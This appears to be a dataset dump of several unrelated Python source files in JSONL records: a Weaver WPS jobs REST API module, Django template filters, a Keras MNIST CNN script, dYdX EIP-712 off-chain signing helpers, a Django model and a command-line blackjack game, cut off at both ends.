find_referring_graphs(obj):\n print(\"Found referrer:\", ref)\n ref.set_next(None)\n del ref\n del obj\n\n print(\"\\nClearing gc.garbage:\")\n del gc.garbage[:]\n\n print(\"\\nCollecting...\")\n n = gc.collect()\n print(\"Unreachable objects:\", n)\n print(\"Remaining Garbage:\", end=' ')\n pprint.pprint(gc.garbage)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"builtin/009.gc/gc_get_referrers.py","file_name":"gc_get_referrers.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"365146183","text":"from typing import TYPE_CHECKING\n\nfrom celery.utils.log import get_task_logger\nfrom pyramid.httpexceptions import HTTPBadRequest, HTTPNotFound, HTTPOk, HTTPPermanentRedirect, HTTPUnauthorized\nfrom pyramid.request import Request\nfrom pyramid.settings import asbool\nfrom pyramid_celery import celery_app as app\n\nfrom notify import encrypt_email\nfrom weaver import sort, status\nfrom weaver.database import get_db\nfrom weaver.datatype import Job\nfrom weaver.exceptions import (\n InvalidIdentifierValue,\n JobNotFound,\n ProcessNotAccessible,\n ProcessNotFound,\n ServiceNotAccessible,\n ServiceNotFound,\n log_unhandled_exceptions\n)\nfrom weaver.formats import CONTENT_TYPE_TEXT_PLAIN, OUTPUT_FORMAT_JSON, get_format\nfrom weaver.owsexceptions import OWSNotFound\nfrom weaver.processes.convert import any2wps_literal_datatype\nfrom weaver.store.base import StoreJobs, StoreProcesses, StoreServices\nfrom weaver.utils import get_any_id, get_any_value, get_settings\nfrom weaver.visibility import VISIBILITY_PUBLIC\nfrom weaver.wps.utils import get_wps_output_url\nfrom weaver.wps_restapi import swagger_definitions as sd\n\nif TYPE_CHECKING:\n from typing import List, Optional, Tuple, Union\n from pyramid.httpexceptions import HTTPException\n from weaver.typedefs import AnySettingsContainer, JSON\n\nLOGGER = get_task_logger(__name__)\n\n\ndef get_job(request):\n # type: (Request) -> Job\n \"\"\"\n Obtain a job from request parameters.\n\n :returns: Job information if found.\n :raise HTTPNotFound: with JSON body details on missing/non-matching job, process, provider IDs.\n \"\"\"\n job_id = request.matchdict.get(\"job_id\")\n store = get_db(request).get_store(StoreJobs)\n try:\n job = store.fetch_by_id(job_id)\n except JobNotFound:\n raise OWSNotFound(code=\"NoSuchJob\", locator=\"JobID\", description=\"Could not find job with specified 'job_id'.\")\n\n provider_id = request.matchdict.get(\"provider_id\", job.service)\n process_id = request.matchdict.get(\"process_id\", job.process)\n\n if job.service != provider_id:\n raise OWSNotFound(\n code=\"NoSuchProvider\",\n locator=\"provider\",\n description=\"Could not find job corresponding to specified 'provider_id'.\"\n )\n if job.process != process_id:\n raise OWSNotFound(\n code=\"NoSuchProcess\",\n locator=\"process\",\n description=\"Could not find job corresponding to specified 'process_id'.\"\n )\n return job\n\n\ndef get_results(job, container, value_key=None, ogc_api=False):\n # type: (Job, AnySettingsContainer, Optional[str], bool) -> Union[List[JSON], JSON]\n \"\"\"\n Obtains the job results with extended full WPS output URL as applicable and according to configuration settings.\n\n :param job: job from which to retrieve results.\n :param container: any container giving access to instance settings (to resolve reference output location).\n :param value_key:\n If not specified, the returned values will have the appropriate ``data``/``href`` key according to the content.\n Otherwise, all values will have the specified key.\n :param ogc_api:\n If ``True``, formats the results using the ``OGC-API - Processes`` format.\n :returns: list of all outputs each with minimally an ID and value under the requested key.\n \"\"\"\n wps_url = get_wps_output_url(container)\n if not wps_url.endswith(\"/\"):\n wps_url = wps_url + \"/\"\n outputs = {} if ogc_api else []\n fmt_key = \"mediaType\" if ogc_api else \"mimeType\"\n for result in job.results:\n rtype = \"data\" if any(k in result for k in [\"data\", \"value\"]) else \"href\"\n value = get_any_value(result)\n out_id = get_any_id(result)\n out_key = rtype\n if rtype == \"href\":\n # fix paths relative to instance endpoint, but leave explicit links as is (eg: S3 bucket, remote HTTP, etc.)\n if value.startswith(\"/\"):\n value = wps_url + str(value).lstrip(\"/\")\n elif ogc_api:\n out_key = \"value\"\n elif value_key:\n out_key = value_key\n output = {out_key: value}\n if rtype == \"href\": # required for the rest to be there, other fields optional\n if \"mimeType\" not in result:\n result[\"mimeType\"] = get_format(value, default=CONTENT_TYPE_TEXT_PLAIN).mime_type\n output[\"format\"] = {fmt_key: result[\"mimeType\"]}\n for field in [\"encoding\", \"schema\"]:\n if field in result:\n output[\"format\"][field] = result[field]\n elif rtype != \"href\":\n # literal data\n # FIXME: BoundingBox not implemented (https://github.com/crim-ca/weaver/issues/51)\n dtype = result.get(\"dataType\", any2wps_literal_datatype(value, is_value=True) or \"string\")\n if ogc_api:\n output[\"dataType\"] = {\"name\": dtype}\n else:\n output[\"dataType\"] = dtype\n\n if ogc_api:\n if out_id in outputs:\n output_list = outputs[out_id]\n if not isinstance(output_list, list):\n output_list = [output_list]\n output_list.append(output)\n outputs[out_id] = output_list\n else:\n outputs[out_id] = output\n else:\n # if ordered insert supported by python version, insert ID first\n output = dict([(\"id\", out_id)] + list(output.items())) # noqa\n outputs.append(output)\n return outputs\n\n\ndef validate_service_process(request):\n # type: (Request) -> Tuple[Optional[str], Optional[str]]\n \"\"\"\n Verifies that service or process specified by path or query will raise the appropriate error if applicable.\n \"\"\"\n service_name = request.matchdict.get(\"provider_id\", None) or request.params.get(\"service\", None)\n process_name = request.matchdict.get(\"process_id\", None) or request.params.get(\"process\", None)\n item_test = None\n item_type = None\n\n try:\n service = None\n if service_name:\n item_type = \"Service\"\n item_test = service_name\n store = get_db(request).get_store(StoreServices)\n service = store.fetch_by_name(service_name, visibility=VISIBILITY_PUBLIC)\n if process_name:\n item_type = \"Process\"\n item_test = process_name\n # local process\n if not service:\n store = get_db(request).get_store(StoreProcesses)\n store.fetch_by_id(process_name, visibility=VISIBILITY_PUBLIC)\n # remote process\n else:\n from weaver.wps_restapi.processes.processes import list_remote_processes\n processes = list_remote_processes(service, request)\n if process_name not in [p.id for p in processes]:\n raise ProcessNotFound\n except (ServiceNotFound, ProcessNotFound):\n raise HTTPNotFound(json={\n \"code\": \"NoSuch{}\".format(item_type),\n \"description\": \"{} of id '{}' cannot be found.\".format(item_type, item_test)\n })\n except (ServiceNotAccessible, ProcessNotAccessible):\n raise HTTPUnauthorized(json={\n \"code\": \"Unauthorized{}\".format(item_type),\n \"description\": \"{} of id '{}' is not accessible.\".format(item_type, item_test)\n })\n except InvalidIdentifierValue as ex:\n raise HTTPBadRequest(json={\n \"code\": InvalidIdentifierValue.__name__,\n \"description\": str(ex)\n })\n\n return service_name, process_name\n\n\n@sd.process_jobs_service.get(tags=[sd.TAG_PROCESSES, sd.TAG_JOBS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.GetProcessJobsEndpoint(), response_schemas=sd.get_all_jobs_responses)\n@sd.provider_jobs_service.get(tags=[sd.TAG_JOBS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.GetProviderJobsEndpoint(), response_schemas=sd.get_all_jobs_responses)\n@sd.jobs_service.get(tags=[sd.TAG_JOBS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.GetJobsEndpoint(), response_schemas=sd.get_all_jobs_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_queried_jobs(request):\n \"\"\"\n Retrieve the list of jobs which can be filtered, sorted, paged and categorized using query parameters.\n \"\"\"\n settings = get_settings(request)\n service, process = validate_service_process(request)\n detail = asbool(request.params.get(\"detail\", False))\n page = request.params.get(\"page\", \"0\")\n page = int(page) if str.isnumeric(page) else 0\n limit = request.params.get(\"limit\", \"10\")\n limit = int(limit) if str.isnumeric(limit) else 10\n email = request.params.get(\"notification_email\", None)\n filters = {\n \"page\": page,\n \"limit\": limit,\n # split by comma and filter empty stings\n \"tags\": list(filter(lambda s: s, request.params.get(\"tags\", \"\").split(\",\"))),\n \"access\": request.params.get(\"access\", None),\n \"status\": request.params.get(\"status\", None),\n \"sort\": request.params.get(\"sort\", sort.SORT_CREATED),\n \"notification_email\": encrypt_email(email, settings) if email else None,\n # service and process can be specified by query (short route) or by path (full route)\n \"process\": process,\n \"service\": service,\n }\n groups = request.params.get(\"groups\", \"\")\n groups = groups.split(\",\") if groups else None\n store = get_db(request).get_store(StoreJobs)\n items, total = store.find_jobs(request=request, group_by=groups, **filters)\n body = {\"total\": total}\n\n def _job_list(jobs):\n return [j.json(settings) if detail else j.id for j in jobs]\n\n if groups:\n for grouped_jobs in items:\n grouped_jobs[\"jobs\"] = _job_list(grouped_jobs[\"jobs\"])\n body.update({\"groups\": items})\n else:\n body.update({\"jobs\": _job_list(items), \"page\": page, \"limit\": limit})\n body = sd.GetQueriedJobsSchema().deserialize(body)\n return HTTPOk(json=body)\n\n\n@sd.provider_job_service.get(tags=[sd.TAG_JOBS, sd.TAG_STATUS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderJobEndpoint(), response_schemas=sd.get_single_job_status_responses)\n@sd.job_service.get(tags=[sd.TAG_JOBS, sd.TAG_STATUS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobEndpoint(), response_schemas=sd.get_single_job_status_responses)\n@sd.process_job_service.get(tags=[sd.TAG_PROCESSES, sd.TAG_JOBS, sd.TAG_STATUS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.GetProcessJobEndpoint(), response_schemas=sd.get_single_job_status_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_status(request):\n \"\"\"\n Retrieve the status of a job.\n \"\"\"\n job = get_job(request)\n job_status = job.json(request, self_link=\"status\")\n return HTTPOk(json=job_status)\n\n\n@sd.provider_job_service.delete(tags=[sd.TAG_JOBS, sd.TAG_DISMISS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderJobEndpoint(), response_schemas=sd.delete_job_responses)\n@sd.job_service.delete(tags=[sd.TAG_JOBS, sd.TAG_DISMISS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobEndpoint(), response_schemas=sd.delete_job_responses)\n@sd.process_job_service.delete(tags=[sd.TAG_PROCESSES, sd.TAG_JOBS, sd.TAG_DISMISS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.DeleteProcessJobEndpoint(), response_schemas=sd.delete_job_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef cancel_job(request):\n \"\"\"\n Dismiss a job.\n\n Note: Will only stop tracking this particular process (WPS 1.0 doesn't allow to stop a process)\n \"\"\"\n job = get_job(request)\n app.control.revoke(job.task_id, terminate=True)\n store = get_db(request).get_store(StoreJobs)\n job.status_message = \"Job dismissed.\"\n job.status = status.map_status(status.STATUS_DISMISSED)\n store.update_job(job)\n\n return HTTPOk(json={\n \"jobID\": job.id,\n \"status\": job.status,\n \"message\": job.status_message,\n \"percentCompleted\": job.progress,\n })\n\n\n@sd.provider_inputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderInputsEndpoint(), response_schemas=sd.get_job_inputs_responses)\n@sd.process_inputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessInputsEndpoint(), response_schemas=sd.get_job_inputs_responses)\n@sd.job_inputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobInputsEndpoint(), response_schemas=sd.get_job_inputs_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_inputs(request):\n # type: (Request) -> HTTPException\n \"\"\"\n Retrieve the inputs of a job.\n \"\"\"\n job = get_job(request)\n inputs = dict(inputs=[dict(id=get_any_id(_input), value=get_any_value(_input)) for _input in job.inputs])\n inputs.update(job.links(request, self_link=\"inputs\"))\n inputs = sd.JobInputsSchema().deserialize(inputs)\n return HTTPOk(json=inputs)\n\n\n@sd.provider_outputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderOutputsEndpoint(), response_schemas=sd.get_job_outputs_responses)\n@sd.process_outputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessOutputsEndpoint(), response_schemas=sd.get_job_outputs_responses)\n@sd.job_outputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobOutputsEndpoint(), response_schemas=sd.get_job_outputs_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_outputs(request):\n # type: (Request) -> HTTPException\n \"\"\"\n Retrieve the outputs of a job.\n \"\"\"\n job = get_job(request)\n outputs = {\"outputs\": get_results(job, request)}\n outputs.update(job.links(request, self_link=\"outputs\"))\n outputs = sd.JobOutputsSchema().deserialize(outputs)\n return HTTPOk(json=outputs)\n\n\n@sd.provider_results_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderResultsEndpoint(), response_schemas=sd.get_job_results_responses)\n@sd.process_results_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessResultsEndpoint(), response_schemas=sd.get_job_results_responses)\n@sd.job_results_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobResultsEndpoint(), response_schemas=sd.get_job_results_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_results(request):\n # type: (Request) -> HTTPException\n \"\"\"\n Retrieve the results of a job.\n \"\"\"\n job = get_job(request)\n job_status = status.map_status(job.status)\n if job_status in status.JOB_STATUS_CATEGORIES[status.STATUS_CATEGORY_RUNNING]:\n raise HTTPNotFound(json={\n \"code\": \"ResultsNotReady\",\n \"description\": \"Job status is '{}'. Results are not yet available.\".format(job_status)\n })\n results = get_results(job, request, value_key=\"value\", ogc_api=True)\n results = sd.Result().deserialize(results)\n return HTTPOk(json=results)\n\n\n@sd.provider_exceptions_service.get(tags=[sd.TAG_JOBS, sd.TAG_EXCEPTIONS, sd.TAG_PROVIDERS],\n renderer=OUTPUT_FORMAT_JSON, schema=sd.ProviderExceptionsEndpoint(),\n response_schemas=sd.get_exceptions_responses)\n@sd.job_exceptions_service.get(tags=[sd.TAG_JOBS, sd.TAG_EXCEPTIONS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobExceptionsEndpoint(), response_schemas=sd.get_exceptions_responses)\n@sd.process_exceptions_service.get(tags=[sd.TAG_JOBS, sd.TAG_EXCEPTIONS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessExceptionsEndpoint(), response_schemas=sd.get_exceptions_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_exceptions(request):\n \"\"\"\n Retrieve the exceptions of a job.\n \"\"\"\n job = get_job(request)\n exceptions = sd.JobExceptionsSchema().deserialize(job.exceptions)\n return HTTPOk(json=exceptions)\n\n\n@sd.provider_logs_service.get(tags=[sd.TAG_JOBS, sd.TAG_LOGS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderLogsEndpoint(), response_schemas=sd.get_logs_responses)\n@sd.job_logs_service.get(tags=[sd.TAG_JOBS, sd.TAG_LOGS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobLogsEndpoint(), response_schemas=sd.get_logs_responses)\n@sd.process_logs_service.get(tags=[sd.TAG_JOBS, sd.TAG_LOGS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessLogsEndpoint(), response_schemas=sd.get_logs_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_logs(request):\n \"\"\"\n Retrieve the logs of a job.\n \"\"\"\n job = get_job(request)\n logs = sd.JobLogsSchema().deserialize(job.logs)\n return HTTPOk(json=logs)\n\n\n@sd.provider_result_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROVIDERS, sd.TAG_DEPRECATED],\n renderer=OUTPUT_FORMAT_JSON, schema=sd.ProviderResultEndpoint(),\n response_schemas=sd.get_result_redirect_responses)\n@sd.process_result_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES, sd.TAG_DEPRECATED],\n renderer=OUTPUT_FORMAT_JSON, schema=sd.ProcessResultEndpoint(),\n response_schemas=sd.get_result_redirect_responses)\n@sd.job_result_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_DEPRECATED],\n renderer=OUTPUT_FORMAT_JSON, schema=sd.JobResultEndpoint(),\n response_schemas=sd.get_result_redirect_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef redirect_job_result(request):\n \"\"\"\n Deprecated job result endpoint that is now returned by corresponding outputs path with added links.\n \"\"\"\n location = request.url.rsplit(\"/\", 1)[0] + \"/outputs\"\n LOGGER.warning(\"Deprecated route redirection [%s] -> [%s]\", request.url, location)\n return HTTPPermanentRedirect(comment=\"deprecated\", location=location)\n","sub_path":"weaver/wps_restapi/jobs/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":19227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"386272402","text":"from django import template\nfrom django.template import Node, NodeList, Template, Context, Variable\nfrom django.template.defaultfilters import stringfilter\nfrom django.utils.html import conditional_escape\nfrom django.utils.safestring import mark_safe\nfrom django.utils.encoding import force_unicode\nfrom django.utils.functional import allow_lazy\nimport types\n\nregister = template.Library()\n\n\n@register.filter\ndef relative(value, arg=None):\n \"Returns a string representing the time relative to the present\"\n from library.relative_time import relative_time\n if not value:\n return u''\n try:\n if arg:\n return relative_time(value,arg)\n return relative_time(value)\n except (ValueError, TypeError):\n return u''\nrelative.is_safe = False\n\n\n@register.filter\n@stringfilter\ndef nl2br(value, autoescape=None):\n \"Replaces all newline charachters with an HTML line break\"\n if autoescape:\n value=conditional_escape(value)\n \n return mark_safe(value.replace('\\n', '
\\n'))\nnl2br.needs_autoescape = True\n\n\t\ndef truncate_chars(s, num):\n \"\"\"\n Template filter to truncate a string to at most num characters respecting word\n boundaries.\n \"\"\"\n s = force_unicode(s)\n length = int(num)\n if len(s) > length:\n length = length - 3\n if s[length-1] == ' ' or s[length] == ' ':\n s = s[:length].strip()\n else:\n words = s[:length].split()\n if len(words) > 1:\n del words[-1]\n s = u' '.join(words)\n s += '...'\n return s\ntruncate_chars = allow_lazy(truncate_chars, unicode)\n\n@register.filter\n@stringfilter\ndef truncatechars(value, arg):\n \"\"\"\n Truncates a string after a certain number of characters, but respects word boundaries.\n \n Argument: Number of characters to truncate after.\n \"\"\"\n try:\n length = int(arg)\n except ValueError: # If the argument is not a valid integer.\n return value # Fail silently.\n return truncate_chars(value, length)\ntruncatechars.is_safe = True\n\nclass PreserveGetVarNode(Node):\n def __init__(self, new_keys):\n self.new_keys = new_keys\n \n def render(self, context):\n get_string = '?'\n\n get_dict = {}\n for k in context['request'].GET:\n get_dict[k] = context['request'].GET[k]\n \n for k in self.new_keys:\n v = self.new_keys[k]\n if (v[0] == \"'\") and (v[-1] == \"'\"):\n v = v[1:-1]\n elif (type(v) == types.IntType):\n v= str(v)\n else:\n v = str(Variable(v).resolve(context))\n get_dict[k] = v\n\n get_list = []\n for k in get_dict:\n get_list.append(k + '=' + get_dict[k])\n\n get_string = '?' + ('&'.join(get_list))\n\n return get_string\n \n \n@register.tag()\ndef preserve_get_vars(parser, token):\n \"\"\"\n Usage: {% get_vars key1=arg1 key2=arg2 ... %}\n \"\"\"\n bits = token.split_contents()[1:]\n new_keys = {}\n for b in bits:\n (k,v) = b.split('=')\n new_keys[k] = v\n return PreserveGetVarNode(new_keys)\n","sub_path":"discussion/templatetags/sfc_tags.py","file_name":"sfc_tags.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"642466586","text":"import os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.activations import *\nfrom tensorflow.keras.models import *\nfrom tensorflow.keras.optimizers import *\nfrom tensorflow.keras.initializers import *\nfrom tensorflow.keras.callbacks import *\n \nfrom plotting import *\n\n# Save Path\ndir_path = os.path.abspath(\"C:/Users/jan/Dropbox/_Programmieren/Udemy Tensorflow Kurs\")\nlog_dir = os.path.abspath(\"C:/Users/Jan/Dropbox/_Programmieren/Udemy Tensorflow Kurs/logs/mnist\")\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data() #28x28x1\nwidth = 28\nheight = 28\ndepth = 1\nnum_classes = 10\ntrain_size, test_size = x_train.shape[0], x_test.shape[0]\nepochs = 1\n\nx_train = x_train.reshape(train_size, width, height, depth)\nx_test = x_test.reshape(test_size, width, height, depth)\ny_train = to_categorical(y_train, num_classes=num_classes)\ny_test = to_categorical(y_test, num_classes=num_classes)\n\n# Define the DNN\ninput_img = Input(shape=(width, height, depth))\n\nx = Conv2D(filters=16, kernel_size=3, padding='same')(input_img)\nx = Activation(\"relu\")(x)\nx = Conv2D(filters=32, kernel_size=3, padding='same')(x)\nx = Activation(\"relu\")(x)\nx = MaxPool2D()(x)\n\nx = Conv2D(filters=32, kernel_size=3, padding='same')(x)\nx = Activation(\"relu\")(x)\nx = Conv2D(filters=64, kernel_size=3, padding='same')(x)\nx = Activation(\"relu\")(x)\nx = MaxPool2D()(x)\n\nx = Flatten()(x)\n\nx = Dense(64)(x)\nx = Activation(\"relu\")(x)\nx = Dense(num_classes)(x)\noutput_pred = Activation(\"softmax\")(x)\n\nmodel = Model(inputs=[input_img], outputs=[output_pred])\n\nmodel.summary()\n\n# Train the DNN\nlr = 5e-4\noptimizer = RMSprop(lr=lr)\n\nmodel.compile(\n loss=\"categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\ntb = TensorBoard(log_dir=log_dir, \n histogram_freq=0)\n\nmodel.fit(\n x=x_train,\n y=y_train,\n verbose=1,\n batch_size=64,\n epochs=epochs,\n validation_data=[x_test, y_test],\n callbacks=[tb])\n\n# Test the DNN\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Score: \", score)","sub_path":"content/Udemy Tensorflow Kurs/Chapter7_CNN/Chapter7_2_CNN_MNIST/mnistCnnModelFinal.py","file_name":"mnistCnnModelFinal.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"537388957","text":"import datetime\n\nimport dateparser as dp\nfrom web3 import Web3\n\nfrom dydx3 import constants\nfrom dydx3.eth_signing import util\n\nDOMAIN = 'dYdX'\nVERSION = '1.0'\nNETWORK_ID = 1\nEIP712_DOMAIN_STRING_NO_CONTRACT = (\n 'EIP712Domain(' +\n 'string name,' +\n 'string version,' +\n 'uint256 chainId' +\n ')'\n)\nEIP712_OFF_CHAIN_ACTION_STRUCT_STRING = (\n 'dYdX(' +\n 'string action,' +\n 'string expiration' +\n ')'\n)\n\n\ndef get_domain_hash():\n return Web3.solidityKeccak(\n [\n 'bytes32',\n 'bytes32',\n 'bytes32',\n 'uint256',\n ],\n [\n util.hash_string(EIP712_DOMAIN_STRING_NO_CONTRACT),\n util.hash_string(DOMAIN),\n util.hash_string(VERSION),\n NETWORK_ID,\n ],\n )\n\n\ndef sign_off_chain_action(\n signer,\n signer_address,\n action,\n expiration=None,\n):\n message_hash = get_off_chain_action_hash(action, expiration)\n raw_signature = signer.sign(message_hash, signer_address)\n return util.create_typed_signature(\n raw_signature,\n constants.SIGNATURE_TYPE_DECIMAL,\n )\n\n\ndef off_chain_action_signature_is_valid(\n typed_signature,\n expected_signer_address,\n action,\n expiration=None\n):\n message_hash = get_off_chain_action_hash(action, expiration)\n signer = util.ec_recover_typed_signature(\n message_hash,\n typed_signature,\n )\n return (\n util.addresses_are_equal(signer, expected_signer_address)\n and (\n dp.parse(\n expiration,\n settings={'TIMEZONE': 'UTC'},\n ) > datetime.datetime.now('UTC') if expiration else True\n )\n )\n\n\ndef get_off_chain_action_hash(\n action,\n expiration=None,\n):\n data = [\n [\n 'bytes32',\n 'bytes32',\n ],\n [\n util.hash_string(EIP712_OFF_CHAIN_ACTION_STRUCT_STRING),\n util.hash_string(action),\n ],\n ]\n if expiration:\n data[0].append('bytes32')\n data[1].append(\n util.hash_string(\n str(dp.parse(expiration, settings={'TIMEZONE': 'UTC'})),\n ),\n )\n struct_hash = Web3.solidityKeccak(data[0], data[1])\n return get_eip712_hash(struct_hash)\n\n\ndef get_eip712_hash(struct_hash):\n return Web3.solidityKeccak(\n [\n 'bytes2',\n 'bytes32',\n 'bytes32',\n ],\n [\n '0x1901',\n get_domain_hash(),\n struct_hash,\n ]\n )\n","sub_path":"dydx3/eth_signing/off_chain_action.py","file_name":"off_chain_action.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"444480163","text":"from django.db import models\nfrom model_utils.models import TimeStampedModel\n\n\nclass Home(TimeStampedModel):\n title = models.CharField('titulo', max_length=50)\n description = models.TextField('Descripcion inicio')\n image = models.ImageField('Imagen', upload_to='Home', blank=True)\n\n class Meta:\n verbose_name = 'Pagina principal'\n verbose_name_plural = 'Pagina principal'\n\n def __str__(self):\n return self.title\n","sub_path":"applications/home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"578332784","text":"#!/usr/bin/env python3\n\n# Harrison Erd\n# Nov 14, 2018\n# Homework 12\n# blackjack game\n\nfrom os import system, name\nfrom random import choice, choices, seed\n\n\ndef result(player_hand, dealer_hand, result_num):\n results = [\"Player bust, DEALER WINS\", \"Dealer bust, PLAYER WINS\",\n \"Tie, DEALER WINS\", \"PLAYER WINS\", \"DEALER WINS\"]\n print(\"\\nDealer cards and total:\")\n print(dealer_hand, total(dealer_hand))\n print(\"Player cards and total:\")\n print(player_hand, total(player_hand))\n print(results[result_num])\n print(\"\\n\\nWould you like to play again?\")\n again = input(\"Press [Y]es to continue or press any key to exit. \")\n if again.lower() == \"y\":\n main()\n else:\n exit()\n\n\ndef total(hand):\n total = 0\n for card in hand:\n if card == \"J\" or card == \"Q\" or card == \"K\":\n total = total + 10\n elif card == \"A\":\n total = total + 11\n else:\n total = total + card\n return total\n\n\ndef main():\n if name == \"nt\":\n system(\"cls\")\n elif name == \"posix\":\n system(\"clear\")\n seed()\n deck = [\"A\", 2, 3, 4, 5, 6, 7, 8, 9, 10, \"J\", \"Q\", \"K\"] * 4\n dealer_hand = choices(deck, k=2)\n player_hand = choices(deck, k=2)\n while True:\n print(\"\\nDealer card:\")\n print(dealer_hand[0])\n print(\"Player cards and total:\")\n print(player_hand, total(player_hand))\n print()\n option = input(\"Would you like to [H]it or [S]stand? \")\n if option.lower() == \"h\":\n player_hand.append(choice(deck))\n if total(player_hand) > 21:\n if \"A\" in player_hand:\n player_hand.remove(\"A\")\n player_hand.append(1)\n if total(player_hand) > 21:\n result(player_hand, dealer_hand, 0)\n else:\n result(player_hand, dealer_hand, 0)\n if option.lower() == \"s\":\n while total(dealer_hand) < 16:\n dealer_hand.append(choice(deck))\n if total(dealer_hand) > 21:\n if \"A\" in dealer_hand:\n dealer_hand.remove(\"A\")\n dealer_hand.append(1)\n if total(dealer_hand) > 21:\n result(player_hand, dealer_hand, 1)\n else:\n result(player_hand, dealer_hand, 1)\n if total(player_hand) == total(dealer_hand):\n result(player_hand, dealer_hand, 2)\n if total(player_hand) > total(dealer_hand) or \\\n total(player_hand) == 21:\n result(player_hand, dealer_hand, 3)\n else:\n result(player_hand, dealer_hand, 4)\n if option.lower() != \"h\" and option.lower() != \"s\":\n print(\"You must enter either 'H' or 'S'!\")\n\nmain()\n\n","sub_path":"blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"502448298","text":"#Set the suits&ranks&values \r\nimport random\r\n\r\nsuits = ('Hearts', 'Diamonds', 'Spades', 'Clubs')\r\nranks = ('Two', 'Three', 'Four', 'Five', 'Six', 'Seven', 'Eight', 'Nine', 'Ten', 'Jack', 'Queen', 'King', 'Ace')\r\nvalues = {'Two':2, 'Three':3, 'Four':4, 'Five':5, 'Six':6, 'Seven':7, 'Eight':8, 'Nine':9, 'Ten':10, 'Jack':10,\r\n 'Queen':10, 'King':10, 'Ace':11}\r\n\r\nplaying = True\r\n#Class definitions\r\n#Card class\r\nclass Card:\r\n \r\n def __init__(self,suit,rank):\r\n self.suit=suit\r\n self.rank=rank\r\n self.value=values[rank]\r\n \r\n \r\n \r\n def 